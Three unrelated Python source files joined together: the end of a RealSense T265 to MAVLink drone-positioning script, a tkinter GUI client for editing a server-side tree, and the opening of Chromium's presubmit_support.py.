help="Configuration for camera orientation. Currently supported: forward, usb port to the right - 0; downward, usb port to the right - 1, 2: forward tilted down 45deg")
parser.add_argument('--debug_enable',type=int,
help="Enable debug messages on terminal")
args = parser.parse_args()
connection_string = args.connect
connection_baudrate = args.baudrate
vision_position_estimate_msg_hz = args.vision_position_estimate_msg_hz
vision_position_delta_msg_hz = args.vision_position_delta_msg_hz
vision_speed_estimate_msg_hz = args.vision_speed_estimate_msg_hz
scale_calib_enable = args.scale_calib_enable
camera_orientation = args.camera_orientation
debug_enable = args.debug_enable
# Using default values if no specified inputs
if not connection_string:
connection_string = connection_string_default
print("INFO: Using default connection_string", connection_string)
else:
print("INFO: Using connection_string", connection_string)
if not connection_baudrate:
connection_baudrate = connection_baudrate_default
print("INFO: Using default connection_baudrate", connection_baudrate)
else:
print("INFO: Using connection_baudrate", connection_baudrate)
if not vision_position_estimate_msg_hz:
vision_position_estimate_msg_hz = vision_position_estimate_msg_hz_default
print("INFO: Using default vision_position_estimate_msg_hz", vision_position_estimate_msg_hz)
else:
print("INFO: Using vision_position_estimate_msg_hz", vision_position_estimate_msg_hz)
if not vision_position_delta_msg_hz:
vision_position_delta_msg_hz = vision_position_delta_msg_hz_default
print("INFO: Using default vision_position_delta_msg_hz", vision_position_delta_msg_hz)
else:
print("INFO: Using vision_position_delta_msg_hz", vision_position_delta_msg_hz)
if not vision_speed_estimate_msg_hz:
vision_speed_estimate_msg_hz = vision_speed_estimate_msg_hz_default
print("INFO: Using default vision_speed_estimate_msg_hz", vision_speed_estimate_msg_hz)
else:
print("INFO: Using vision_speed_estimate_msg_hz", vision_speed_estimate_msg_hz)
if body_offset_enabled == 1:
print("INFO: Using camera position offset: Enabled, x y z is", body_offset_x, body_offset_y, body_offset_z)
else:
print("INFO: Using camera position offset: Disabled")
if compass_enabled == 1:
print("INFO: Using compass: Enabled. Heading will be aligned to north.")
else:
print("INFO: Using compass: Disabled")
if scale_calib_enable == True:
print("\nINFO: SCALE CALIBRATION PROCESS. DO NOT RUN DURING FLIGHT.\nINFO: TYPE IN NEW SCALE IN FLOATING POINT FORMAT\n")
else:
if scale_factor == 1.0:
print("INFO: Using default scale factor", scale_factor)
else:
print("INFO: Using scale factor", scale_factor)
if camera_orientation is None:
camera_orientation = camera_orientation_default
print("INFO: Using default camera orientation", camera_orientation)
else:
print("INFO: Using camera orientation", camera_orientation)
if camera_orientation == 0: # Forward, USB port to the right
H_aeroRef_T265Ref = np.array([[0,0,-1,0],[1,0,0,0],[0,-1,0,0],[0,0,0,1]])
H_T265body_aeroBody = np.linalg.inv(H_aeroRef_T265Ref)
elif camera_orientation == 1: # Downfacing, USB port to the right
H_aeroRef_T265Ref = np.array([[0,0,-1,0],[1,0,0,0],[0,-1,0,0],[0,0,0,1]])
H_T265body_aeroBody = np.array([[0,1,0,0],[1,0,0,0],[0,0,-1,0],[0,0,0,1]])
elif camera_orientation == 2: # 45degree forward
H_aeroRef_T265Ref = np.array([[0,0,-1,0],[1,0,0,0],[0,-1,0,0],[0,0,0,1]])
H_T265body_aeroBody = (tf.euler_matrix(m.pi/4, 0, 0)).dot(np.linalg.inv(H_aeroRef_T265Ref))
else: # Default is facing forward, USB port to the right
H_aeroRef_T265Ref = np.array([[0,0,-1,0],[1,0,0,0],[0,-1,0,0],[0,0,0,1]])
H_T265body_aeroBody = np.linalg.inv(H_aeroRef_T265Ref)
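# Naming convention (assumed from the variable names): H_A_B is the 4x4
# homogeneous transform taking coordinates in frame B into frame A, so
# adjacent frames cancel when chained:
# H_aeroRef_aeroBody = H_aeroRef_T265Ref . H_T265Ref_T265body . H_T265body_aeroBody
# which is exactly the composition performed in the main loop below.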
if not debug_enable:
debug_enable = 0
else:
debug_enable = 1
np.set_printoptions(precision=4, suppress=True) # Format output on terminal
print("INFO: Debug messages enabled.")
#######################################
# Functions
#######################################
# https://mavlink.io/en/messages/common.html#VISION_POSITION_ESTIMATE
def send_vision_position_estimate_message():
global is_vehicle_connected, current_time_us, H_aeroRef_aeroBody, reset_counter
with lock:
if is_vehicle_connected == True and H_aeroRef_aeroBody is not None:
# Setup angle data
rpy_rad = np.array( tf.euler_from_matrix(H_aeroRef_aeroBody, 'sxyz'))
# Setup covariance data, which is the upper right triangle of the covariance matrix, see here: https://files.gitter.im/ArduPilot/VisionProjects/1DpU/image.png
# Attempt #1: following this formula https://github.com/IntelRealSense/realsense-ros/blob/development/realsense2_camera/src/base_realsense_node.cpp#L1406-L1411
cov_pose = linear_accel_cov * pow(10, 3 - int(data.tracker_confidence))
cov_twist = angular_vel_cov * pow(10, 1 - int(data.tracker_confidence))
covariance = np.array([cov_pose, 0, 0, 0, 0, 0,
cov_pose, 0, 0, 0, 0,
cov_pose, 0, 0, 0,
cov_twist, 0, 0,
cov_twist, 0,
cov_twist])
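# The 21 values above are the row-major upper triangle of the 6x6
# pose/twist covariance matrix (6+5+4+3+2+1 entries): the first row
# contributes 6 values, the second the 5 values right of its diagonal,
# and so on down to the single bottom-right element.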
# Setup the message to be sent
msg = vehicle.message_factory.vision_position_estimate_encode(
current_time_us, # us Timestamp (UNIX time or time since system boot)
H_aeroRef_aeroBody[0][3], # Global X position
H_aeroRef_aeroBody[1][3], # Global Y position
H_aeroRef_aeroBody[2][3], # Global Z position
rpy_rad[0], # Roll angle
rpy_rad[1], # Pitch angle
rpy_rad[2], # Yaw angle
covariance, # Row-major representation of pose 6x6 cross-covariance matrix
reset_counter # Estimate reset counter. Increment every time pose estimate jumps.
)
vehicle.send_mavlink(msg)
vehicle.flush()
# https://mavlink.io/en/messages/ardupilotmega.html#VISION_POSITION_DELTA
def send_vision_position_delta_message():
global is_vehicle_connected, current_time_us, current_confidence_level, H_aeroRef_aeroBody
with lock:
if is_vehicle_connected == True and H_aeroRef_aeroBody is not None:
# Calculate the deltas in position, attitude and time from the previous to current orientation
H_aeroRef_PrevAeroBody = send_vision_position_delta_message.H_aeroRef_PrevAeroBody
H_PrevAeroBody_CurrAeroBody = (np.linalg.inv(H_aeroRef_PrevAeroBody)).dot(H_aeroRef_aeroBody)
delta_time_us = current_time_us - send_vision_position_delta_message.prev_time_us
delta_position_m = [H_PrevAeroBody_CurrAeroBody[0][3], H_PrevAeroBody_CurrAeroBody[1][3], H_PrevAeroBody_CurrAeroBody[2][3]]
delta_angle_rad = np.array( tf.euler_from_matrix(H_PrevAeroBody_CurrAeroBody, 'sxyz'))
# Send the message
msg = vehicle.message_factory.vision_position_delta_encode(
current_time_us, # us: Timestamp (UNIX time or time since system boot)
delta_time_us, # us: Time since last reported camera frame
delta_angle_rad, # float[3] in radian: Defines a rotation vector in body frame that rotates the vehicle from the previous to the current orientation
delta_position_m, # float[3] in m: Change in position from previous to current frame rotated into body frame (0=forward, 1=right, 2=down)
current_confidence_level # Normalized confidence value from 0 to 100.
)
vehicle.send_mavlink(msg)
vehicle.flush()
# Save static variables
send_vision_position_delta_message.H_aeroRef_PrevAeroBody = H_aeroRef_aeroBody
send_vision_position_delta_message.prev_time_us = current_time_us
# https://mavlink.io/en/messages/common.html#VISION_SPEED_ESTIMATE
def send_vision_speed_estimate_message():
global is_vehicle_connected, current_time_us, V_aeroRef_aeroBody, reset_counter
with lock:
if is_vehicle_connected == True and V_aeroRef_aeroBody is not None:
# Attempt #1: following this formula https://github.com/IntelRealSense/realsense-ros/blob/development/realsense2_camera/src/base_realsense_node.cpp#L1406-L1411
cov_pose = linear_accel_cov * pow(10, 3 - int(data.tracker_confidence))
covariance = np.array([cov_pose, 0, 0,
0, cov_pose, 0,
0, 0, cov_pose])
# Setup the message to be sent
msg = vehicle.message_factory.vision_speed_estimate_encode(
current_time_us, # us Timestamp (UNIX time or time since system boot)
V_aeroRef_aeroBody[0][3], # Global X speed
V_aeroRef_aeroBody[1][3], # Global Y speed
V_aeroRef_aeroBody[2][3], # Global Z speed
covariance, # covariance
reset_counter # Estimate reset counter. Increment every time pose estimate jumps.
)
vehicle.send_mavlink(msg)
vehicle.flush()
# Update the changes of confidence level on GCS and terminal
def update_tracking_confidence_to_gcs():
if data is None: # No pose data received yet; nothing to report
return
if update_tracking_confidence_to_gcs.prev_confidence_level != data.tracker_confidence:
confidence_status_string = 'Tracking confidence: ' + pose_data_confidence_level[data.tracker_confidence]
send_msg_to_gcs(confidence_status_string)
update_tracking_confidence_to_gcs.prev_confidence_level = data.tracker_confidence
# https://mavlink.io/en/messages/common.html#STATUSTEXT
def send_msg_to_gcs(text_to_be_sent):
# MAV_SEVERITY: 0=EMERGENCY 1=ALERT 2=CRITICAL 3=ERROR, 4=WARNING, 5=NOTICE, 6=INFO, 7=DEBUG, 8=ENUM_END
# Defined here: https://mavlink.io/en/messages/common.html#MAV_SEVERITY
# MAV_SEVERITY = 3 will let the message be displayed on Mission Planner HUD, but 6 is ok for QGroundControl
if is_vehicle_connected == True:
text_msg = 'T265: ' + text_to_be_sent
status_msg = vehicle.message_factory.statustext_encode(
6, # MAV_SEVERITY
text_msg.encode() # max size is char[50]
)
vehicle.send_mavlink(status_msg)
vehicle.flush()
print("INFO: " + text_to_be_sent)
else:
print("INFO: Vehicle not connected. Cannot send text message to Ground Control Station (GCS)")
# Send a mavlink SET_GPS_GLOBAL_ORIGIN message (http://mavlink.org/messages/common#SET_GPS_GLOBAL_ORIGIN), which allows us to use local position information without a GPS.
def set_default_global_origin():
if is_vehicle_connected == True:
msg = vehicle.message_factory.set_gps_global_origin_encode(
int(vehicle._master.source_system),
home_lat,
home_lon,
home_alt
)
vehicle.send_mavlink(msg)
vehicle.flush()
# Send a mavlink SET_HOME_POSITION message (http://mavlink.org/messages/common#SET_HOME_POSITION), which allows us to use local position information without a GPS.
def set_default_home_position():
if is_vehicle_connected == True:
x = 0
y = 0
z = 0
q = [1, 0, 0, 0] # w x y z
approach_x = 0
approach_y = 0
approach_z = 1
msg = vehicle.message_factory.set_home_position_encode(
int(vehicle._master.source_system),
home_lat,
home_lon,
home_alt,
x,
y,
z,
q,
approach_x,
approach_y,
approach_z
)
vehicle.send_mavlink(msg)
vehicle.flush()
# Request a timesync update from the flight controller, for future work.
# TODO: Inspect the usage of timesync_update
def update_timesync(ts=0, tc=0):
if ts == 0:
ts = int(round(time.time() * 1000))
msg = vehicle.message_factory.timesync_encode(
tc, # tc1
ts # ts1
)
vehicle.send_mavlink(msg)
vehicle.flush()
# Listen to attitude data to acquire heading when compass data is enabled
def att_msg_callback(self, attr_name, value):
global heading_north_yaw
if heading_north_yaw is None:
heading_north_yaw = value.yaw
print("INFO: Received first ATTITUDE message with heading yaw", heading_north_yaw * 180 / m.pi, "degrees")
else:
heading_north_yaw = value.yaw
print("INFO: Received ATTITUDE message with heading yaw", heading_north_yaw * 180 / m.pi, "degrees")
def vehicle_connect():
global vehicle, is_vehicle_connected
try:
vehicle = connect(connection_string, wait_ready = True, baud = connection_baudrate, source_system = 1)
except Exception as e:
print('Connection error: {}! Retrying...'.format(e))
sleep(1)
if vehicle is None:
is_vehicle_connected = False
return False
else:
is_vehicle_connected = True
return True
# List of notification events: https://github.com/IntelRealSense/librealsense/blob/development/include/librealsense2/h/rs_types.h
# List of notification API: https://github.com/IntelRealSense/librealsense/blob/development/common/notifications.cpp
def realsense_notification_callback(notif):
global reset_counter
print("INFO: T265 event: " + notif)
if notif.get_category() is rs.notification_category.pose_relocalization:
reset_counter += 1
send_msg_to_gcs('Relocalization detected')
def realsense_connect():
global pipe, pose_sensor
# Declare RealSense pipeline, encapsulating the actual device and sensors
pipe = rs.pipeline()
# Build config object before requesting data
cfg = rs.config()
# Enable the stream we are interested in
cfg.enable_stream(rs.stream.pose) # Positional data
# Configure callback for relocalization event
device = cfg.resolve(pipe).get_device()
pose_sensor = device.first_pose_sensor()
pose_sensor.set_notifications_callback(realsense_notification_callback)
# Start streaming with requested config
pipe.start(cfg)
# Monitor user input from the terminal and perform action accordingly
def user_input_monitor():
global scale_factor
while True:
# Special case: updating scale
if scale_calib_enable == True:
scale_factor = float(input("INFO: Type in new scale as float number\n"))
print("INFO: New scale is ", scale_factor)
if enable_auto_set_ekf_home:
send_msg_to_gcs('Set EKF home with default GPS location')
set_default_global_origin()
set_default_home_position()
time.sleep(1) # Wait a short while for FCU to start working
# Add new action here according to the key pressed.
# Enter: Set EKF home when user press enter
try:
c = input()
if c == "":
send_msg_to_gcs('Set EKF home with default GPS location')
set_default_global_origin()
set_default_home_position()
else:
print("Got keyboard input", c)
except IOError: pass
#######################################
# Main code starts here
#######################################
print("INFO: Connecting to vehicle.")
while (not vehicle_connect()):
pass
print("INFO: Vehicle connected.")
send_msg_to_gcs('Connecting to camera...')
realsense_connect()
send_msg_to_gcs('Camera connected.')
if compass_enabled == 1:
# Listen to the attitude data in aeronautical frame
vehicle.add_message_listener('ATTITUDE', att_msg_callback)
# Send MAVlink messages in the background at pre-determined frequencies
sched = BackgroundScheduler()
if enable_msg_vision_position_estimate:
sched.add_job(send_vision_position_estimate_message, 'interval', seconds = 1/vision_position_estimate_msg_hz)
if enable_msg_vision_position_delta:
sched.add_job(send_vision_position_delta_message, 'interval', seconds = 1/vision_position_delta_msg_hz)
send_vision_position_delta_message.H_aeroRef_PrevAeroBody = tf.quaternion_matrix([1,0,0,0])
send_vision_position_delta_message.prev_time_us = int(round(time.time() * 1000000))
if enable_msg_vision_speed_estimate:
sched.add_job(send_vision_speed_estimate_message, 'interval', seconds = 1/vision_speed_estimate_msg_hz)
if enable_update_tracking_confidence_to_gcs:
sched.add_job(update_tracking_confidence_to_gcs, 'interval', seconds = 1/update_tracking_confidence_to_gcs_hz_default)
update_tracking_confidence_to_gcs.prev_confidence_level = -1
# A separate thread to monitor user input
user_keyboard_input_thread = threading.Thread(target=user_input_monitor)
user_keyboard_input_thread.daemon = True
user_keyboard_input_thread.start()
sched.start()
if compass_enabled == 1:
time.sleep(1) # Wait a short while for yaw to be correctly initiated
send_msg_to_gcs('Sending vision messages to FCU')
print("INFO: Press Enter to set EKF home at default location")
try:
while True:
# Monitor last_heartbeat to reconnect in case of lost connection
if vehicle.last_heartbeat > connection_timeout_sec_default:
is_vehicle_connected = False
print("WARNING: CONNECTION LOST. Last hearbeat was %f sec ago."% vehicle.last_heartbeat)
print("WARNING: Attempting to reconnect ...")
vehicle_connect()
continue
# Wait for the next set of frames from the camera
frames = pipe.wait_for_frames()
# Fetch pose frame
pose = frames.get_pose_frame()
# Process data
if pose:
with lock:
# Store the timestamp for MAVLink messages
current_time_us = int(round(time.time() * 1000000))
# Pose data consists of translation and rotation
data = pose.get_pose_data()
# Confidence level value from T265: 0-3, remapped to 0 - 100: 0% - Failed / 33.3% - Low / 66.6% - Medium / 100% - High
current_confidence_level = float(data.tracker_confidence * 100 / 3)
# In transformations, Quaternions w+ix+jy+kz are represented as [w, x, y, z]!
H_T265Ref_T265body = tf.quaternion_matrix([data.rotation.w, data.rotation.x, data.rotation.y, data.rotation.z])
H_T265Ref_T265body[0][3] = data.translation.x * scale_factor
H_T265Ref_T265body[1][3] = data.translation.y * scale_factor
H_T265Ref_T265body[2][3] = data.translation.z * scale_factor
# Transform to aeronautic coordinates (body AND reference frame!)
H_aeroRef_aeroBody = H_aeroRef_T265Ref.dot( H_T265Ref_T265body.dot( H_T265body_aeroBody))
# Calculate GLOBAL XYZ speed (speed from T265 is already GLOBAL)
V_aeroRef_aeroBody = tf.quaternion_matrix([1,0,0,0])
V_aeroRef_aeroBody[0][3] = data.velocity.x
V_aeroRef_aeroBody[1][3] = data.velocity.y
V_aeroRef_aeroBody[2][3] = data.velocity.z
V_aeroRef_aeroBody = H_aeroRef_T265Ref.dot(V_aeroRef_aeroBody)
# Check for pose jump and increment reset_counter
if prev_data is not None:
delta_translation = [data.translation.x - prev_data.translation.x, data.translation.y - prev_data.translation.y, data.translation.z - prev_data.translation.z]
position_displacement = np.linalg.norm(delta_translation)
# A pose jump is indicated when the position changes abruptly. The behavior is not well documented yet (as of librealsense 2.34.0)
jump_threshold = 0.1 # In meters, from trial and error; should be relative to how frequently position data is obtained (200Hz for the T265)
if (position_displacement > jump_threshold):
send_msg_to_gcs('Pose jump detected')
print("Position jumped by: ", position_displacement)
reset_counter += 1
prev_data = data
# Take offsets from body's center of gravity (or IMU) to camera's origin into account
if body_offset_enabled == 1:
H_body_camera = tf.euler_matrix(0, 0, 0, 'sxyz')
H_body_camera[0][3] = body_offset_x
H_body_camera[1][3] = body_offset_y
H_body_camera[2][3] = body_offset_z
H_camera_body = np.linalg.inv(H_body_camera)
H_aeroRef_aeroBody = H_body_camera.dot(H_aeroRef_aeroBody.dot(H_camera_body))
# Realign heading to face north using initial compass data
if compass_enabled == 1:
H_aeroRef_aeroBody = H_aeroRef_aeroBody.dot( tf.euler_matrix(0, 0, heading_north_yaw, 'sxyz'))
# Show debug messages here
if debug_enable == 1:
os.system('clear') # This helps in displaying the messages to be more readable
print("DEBUG: Raw RPY[deg]: {}".format( np.array( tf.euler_from_matrix( H_T265Ref_T265body, 'sxyz')) * 180 / m.pi))
print("DEBUG: NED RPY[deg]: {}".format( np.array( tf.euler_from_matrix( H_aeroRef_aeroBody, 'sxyz')) * 180 / m.pi))
print("DEBUG: Raw pos xyz : {}".format( np.array( [data.translation.x, data.translation.y, data.translation.z])))
print("DEBUG: NED pos xyz : {}".format( np.array( tf.translation_from_matrix( H_aeroRef_aeroBody))))
except KeyboardInterrupt:
send_msg_to_gcs('Closing the script...')
except Exception:
send_msg_to_gcs('ERROR IN SCRIPT')
print("Unexpected error:", sys.exc_info()[0])
finally:
pipe.stop()
vehicle.close()
print("INFO: Realsense pipeline and vehicle object closed.")
sys.exit()
|
main_window.py
|
from tkinter import *
from tkinter import ttk
import uuid
import requests
import json
import threading
from popup_window import PopupWindow
from events import EventsManager, AddEvent, DeleteEvent, EditEvent
server = 'https://treedb.herokuapp.com/'
# server = 'http://127.0.0.1:8080/'
def run_in_thread(fn):
def run(*k, **kw):
thread = threading.Thread(target=fn, args=k, kwargs=kw)
thread.start()
return thread
return run
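# Note (inferred from the decorator above): calling a decorated function
# returns the started Thread object rather than the function's result, so a
# hypothetical caller could do `t = self.apply(); t.join()` to wait for the
# background work to finish.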
def get_all_tree():
r = requests.get(server + 'tree')
return json.loads(r.text)['tree']
def get_node(node_id):
r = requests.get(server + 'tree/' + str(node_id))
return json.loads(r.text)
def update(tree):
r = requests.post(server + 'tree/update/', json=tree)
return json.loads(r.text)['tree']
def update_events(events):
r = requests.post(server + 'tree/update/events/', json=events)
return json.loads(r.text)['nodes']
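# Assumed node payload shape, inferred from how the tree is consumed below
# (not taken from the server's documentation):
# {'node': {'id': 1, 'root': None, 'name': 'Root', 'deleted': False},
# 'children': [...], 'uuid': '<uuid4 assigned client-side>'}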
class MainWindow(object):
db_tree_data = list()
cached_tree_data = list()
entry_window = None
def __init__(self, root):
self.events_manager = EventsManager()
self.root = root
# Base layer
self.cachedTreeFrame = ttk.Frame(root, borderwidth=2, relief=GROOVE)
self.cachedTreeFrame.grid(row=0, column=0, sticky=W+N+E+S)
self.dbTreeFrame = ttk.Frame(root, borderwidth=2, relief=GROOVE)
self.dbTreeFrame.grid(row=0, column=2, sticky=N+W+E+S)
self.buttonsFrame = ttk.Frame(root, borderwidth=2)
self.buttonsFrame.grid(row=1, column=0, sticky=W)
# Buttons
self.buttonsFrame.addButton = ttk.Button(self.buttonsFrame, text='+', command=self.add_node)
self.buttonsFrame.addButton.grid(row=1, column=1)
self.buttonsFrame.getButton = ttk.Button(self.root, text='<<<', command=self.get_node_from_db)
self.buttonsFrame.getButton.grid(row=0, column=1)
self.buttonsFrame.deleteButton = ttk.Button(self.buttonsFrame, text='-', command=self.delete_node)
self.buttonsFrame.deleteButton.grid(row=1, column=2)
self.buttonsFrame.resetButton = ttk.Button(self.buttonsFrame, text='Reset', command=self.reset)
self.buttonsFrame.resetButton.grid(row=2, column=3)
self.buttonsFrame.editButton = ttk.Button(self.buttonsFrame, text='Edit', command=self.edit)
self.buttonsFrame.editButton.grid(row=1, column=3)
self.buttonsFrame.applyButton = ttk.Button(self.buttonsFrame, text='Apply', command=self.apply)
self.buttonsFrame.applyButton.grid(row=2, column=1)
self.buttonsFrame.applyEventsButton = ttk.Button(self.buttonsFrame, text='Apply events', command=self.apply_events)
# self.buttonsFrame.applyEventsButton.grid(row=3, column=1)
# Trees
self.cachedTreeFrame.cachedTree = ttk.Treeview(self.cachedTreeFrame)
self.cachedTreeFrame.cachedTree.heading('#0', text='Cached tree')
self.cachedTreeFrame.cachedTree.pack(fill=BOTH, expand=1)
self.dbTreeFrame.dbTree = ttk.Treeview(self.dbTreeFrame)
self.dbTreeFrame.dbTree.heading('#0', text='Database tree')
self.dbTreeFrame.dbTree.pack(fill=BOTH, expand=1)
# Initialize
self.root.after(1000, self.load_db_data)
def popup(self, node_name):
self.entry_window = PopupWindow(self.root, node_name)
self.buttonsFrame.addButton["state"] = "disabled"
self.root.wait_window(self.entry_window.top)
self.buttonsFrame.addButton["state"] = "normal"
@run_in_thread
def load_db_data(self):
requests.get(server + 'tree/clear')
with open('testdb.json') as data_file:
data = json.load(data_file)
update([data])
self.db_tree_data = get_all_tree()
self.redraw_db()
def _redraw(self, subtree, widget_tree):
"""
Clear tree and render
:param subtree:
:param widget_tree:
:return:
"""
for i in widget_tree.get_children():
widget_tree.delete(i)
self.render_tree(subtree, widget_tree)
def redraw_cached(self):
self._redraw(self.cached_tree_data, self.cachedTreeFrame.cachedTree)
def redraw_db(self):
self._redraw(self.db_tree_data, self.dbTreeFrame.dbTree)
def render_tree(self, subtree, widget_tree, root_node_uuid=""):
"""
Render tree
:param subtree:
:param widget_tree:
:type widget_tree: ttk.Treeview
:param root_node_uuid:
:return:
"""
for child in subtree:
if 'uuid' not in child:
child['uuid'] = str(uuid.uuid4())
node = child['node']
tag = 'deleted' if node['deleted'] else 'normal'
if child['node']['id'] is None:
child['node']['id'] = child['uuid']
child['new'] = True
widget_tree.insert(
root_node_uuid,
0,
child["uuid"],
text=node['name'], # + " - " + child['uuid'] + " - " + str(child['node']['id']),
values=child["uuid"],
open=True,
tag=tag)
widget_tree.tag_configure('deleted', font='Times 10 italic') # Deleted nodes are rendered in italics
widget_tree.tag_configure('normal', font='Times 10 normal')
widget_tree = self.render_tree(child['children'], widget_tree, root_node_uuid=child["uuid"])
return widget_tree
def append_to_cache(self, node):
rnid = node['root']
nid = node['id']
children = list()
to_delete = list()
for child in self.cached_tree_data:
if child['node']['root'] == nid and child['node']['root'] is not None:
to_delete.append(child)
children.append(child)
for ditem in to_delete:
self.cached_tree_data.pop(self.cached_tree_data.index(ditem))
if nid is not None and self.find_node_data_by_id(nid, self.cached_tree_data) is not None:
return
cached_root_node = self.find_node_data_by_id(rnid, self.cached_tree_data)
if cached_root_node:
cached_root_node['children'].append({'node': node, 'children': children})
if cached_root_node['node']['deleted'] and not node['deleted']:
self.delete_subtree({'node': node, 'children': children})
else:
self.cached_tree_data.append({'node': node, 'children': children})
self.redraw_cached()
def find_node_data_by_uuid(self, node_uuid, subtree):
res = None
for child in subtree:
if child['uuid'] == node_uuid:
res = child
break
else:
res = self.find_node_data_by_uuid(node_uuid, child['children'])
if res is not None:
break
return res
def find_node_data_by_id(self, node_id, subtree):
res = None
for child in subtree:
if child['node']['id'] == node_id:
res = child
break
else:
res = self.find_node_data_by_id(node_id, child['children'])
if res is not None:
break
return res
def node_exists(self, node_id, subtree):
"""
Check if node exists in tree
:param node_id:
:param subtree:
:return:
"""
return self.find_node_data_by_id(node_id, subtree) is not None
def delete_subtree(self, node):
node['node']['deleted'] = True
res = dict()
res['node'] = node['node']
res['children'] = list()
for child in node['children']:
if not child['node']['deleted']:
res['children'].append(self.delete_subtree(child))
return res
def add_node(self):
cache_selected_items = self.cachedTreeFrame.cachedTree.selection()
if len(cache_selected_items) != 0:
self.popup('')
if len(self.entry_window.value) == 0:
return
item = self.cachedTreeFrame.cachedTree.item(cache_selected_items[0])
node_name = self.entry_window.value
node_id = str(uuid.uuid4())
root_node_data = self.find_node_data_by_uuid(item['values'][0], self.cached_tree_data)
self.events_manager.append_event(AddEvent(node_id, root_node_data['node']['id'], node_name))
if not root_node_data['node']['deleted']:
node_data = {'name': node_name, 'root': root_node_data['node']['id'], 'id': None, 'deleted': False}
self.append_to_cache(node_data)
@run_in_thread
def get_node_from_db(self):
db_selected_items = self.dbTreeFrame.dbTree.selection()
if len(db_selected_items) != 0:
item = self.dbTreeFrame.dbTree.item(db_selected_items[0])
db_node_data = self.find_node_data_by_uuid(item['values'][0], self.db_tree_data)['node']
if not db_node_data['deleted']:
nid = db_node_data['id']
if not self.node_exists(nid, self.cached_tree_data):
res_node = get_node(nid)
self.append_to_cache(res_node)
def delete_node(self):
cache_selected_items = self.cachedTreeFrame.cachedTree.selection()
if len(cache_selected_items) == 0:
return
item = self.cachedTreeFrame.cachedTree.item(cache_selected_items[0])
node_data = self.find_node_data_by_uuid(item['values'][0], self.cached_tree_data)
self.events_manager.append_event(DeleteEvent(node_data['node']['id']))
if not node_data['node']['deleted']:
self.delete_subtree(node_data)
self.redraw_cached()
def reset(self):
self.load_db_data()
self.cached_tree_data = list()
self.redraw_cached()
def edit(self):
cache_selected_items = self.cachedTreeFrame.cachedTree.selection()
if len(cache_selected_items) != 0:
item = self.cachedTreeFrame.cachedTree.item(cache_selected_items[0])
node_data = self.find_node_data_by_uuid(item['values'][0], self.cached_tree_data)
if node_data['node']['deleted'] is True:
return
self.popup(item['text'])
if len(self.entry_window.value) == 0:
return
node_name = self.entry_window.value
node_data['node']['name'] = node_name
self.events_manager.append_event(EditEvent(node_data['node']['id'], node_name))
self.redraw_cached()
def _refill_new(self, children):
for child in children:
if 'new' in child:
child['node']['id'] = None
child['node']['root'] = None
self._refill_new(child['children'])
@run_in_thread
def apply(self):
self._refill_new(self.cached_tree_data)
self.cached_tree_data = update(self.cached_tree_data)
self.db_tree_data = get_all_tree()
self.redraw_db()
self.redraw_cached()
@run_in_thread
def apply_events(self):
events = self.events_manager.serialize_events()
update_events(events)
self.db_tree_data = get_all_tree()
self.redraw_db()
self.redraw_cached()
self.events_manager.clear()
|
presubmit_support.py
|
#!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Enables directory-specific presubmit checks to run at upload and/or commit.
"""
from __future__ import print_function
__version__ = '2.0.0'
# TODO(joi) Add caching where appropriate/needed. The API is designed to allow
# caching (between all different invocations of presubmit scripts for a given
# change). We should add it as our presubmit scripts start feeling slow.
import argparse
import ast # Exposed through the API.
import contextlib
import cpplint
import fnmatch # Exposed through the API.
import glob
import inspect
import itertools
import json # Exposed through the API.
import logging
import multiprocessing
import os # Somewhat exposed through the API.
import random
import re # Exposed through the API.
import signal
import six
import sys # Parts exposed through API.
import tempfile # Exposed through the API.
import threading
import time
import traceback
import unittest # Exposed through the API.
from warnings import warn
# Local imports.
import fix_encoding
import gclient_paths # Exposed through the API
import gclient_utils
import git_footers
import gerrit_util
import owners as owners_db
import owners_client
import owners_finder
import presubmit_canned_checks
import rdb_wrapper
import scm
import subprocess2 as subprocess # Exposed through the API.
if sys.version_info.major == 2:
# TODO(1009814): Expose urllib2 only through urllib_request and urllib_error
import urllib2 # Exposed through the API.
import urlparse
import urllib2 as urllib_request
import urllib2 as urllib_error
else:
import urllib.parse as urlparse
import urllib.request as urllib_request
import urllib.error as urllib_error
# Ask for feedback only once in program lifetime.
_ASKED_FOR_FEEDBACK = False
def time_time():
# Use this so that it can be mocked in tests without interfering with python
# system machinery.
return time.time()
class PresubmitFailure(Exception):
pass
class CommandData(object):
def __init__(self, name, cmd, kwargs, message, python3=False):
self.name = name
self.cmd = cmd
self.stdin = kwargs.get('stdin', None)
self.kwargs = kwargs.copy()
self.kwargs['stdout'] = subprocess.PIPE
self.kwargs['stderr'] = subprocess.STDOUT
self.kwargs['stdin'] = subprocess.PIPE
self.message = message
self.info = None
self.python3 = python3
# Adapted from
# https://github.com/google/gtest-parallel/blob/master/gtest_parallel.py#L37
#
# An object that catches SIGINT sent to the Python process and notices
# if processes passed to wait() die by SIGINT (we need to look for
# both of those cases, because pressing Ctrl+C can result in either
# the main process or one of the subprocesses getting the signal).
#
# Before a SIGINT is seen, wait(p) will simply call p.wait() and
# return the result. Once a SIGINT has been seen (in the main process
# or a subprocess, including the one the current call is waiting for),
# wait(p) will call p.terminate().
class SigintHandler(object):
sigint_returncodes = {-signal.SIGINT, # Unix
-1073741510, # Windows
}
def __init__(self):
self.__lock = threading.Lock()
self.__processes = set()
self.__got_sigint = False
self.__previous_signal = signal.signal(signal.SIGINT, self.interrupt)
def __on_sigint(self):
self.__got_sigint = True
while self.__processes:
try:
self.__processes.pop().terminate()
except OSError:
pass
def interrupt(self, signal_num, frame):
with self.__lock:
self.__on_sigint()
self.__previous_signal(signal_num, frame)
def got_sigint(self):
with self.__lock:
return self.__got_sigint
def wait(self, p, stdin):
with self.__lock:
if self.__got_sigint:
p.terminate()
self.__processes.add(p)
stdout, stderr = p.communicate(stdin)
code = p.returncode
with self.__lock:
self.__processes.discard(p)
if code in self.sigint_returncodes:
self.__on_sigint()
return stdout, stderr
sigint_handler = SigintHandler()
class Timer(object):
def __init__(self, timeout, fn):
self.completed = False
self._fn = fn
self._timer = threading.Timer(timeout, self._onTimer) if timeout else None
def __enter__(self):
if self._timer:
self._timer.start()
return self
def __exit__(self, _type, _value, _traceback):
if self._timer:
self._timer.cancel()
def _onTimer(self):
self._fn()
self.completed = True
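# Minimal usage sketch (assumption; mirrors _RunWithTimeout below): arm the
# timer with the subprocess's kill switch so a slow process is terminated,
# e.g.
# with Timer(timeout, proc.terminate) as timer:
# out, _ = proc.communicate()
# After the block, timer.completed is True iff the timeout fired and the
# process was terminated.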
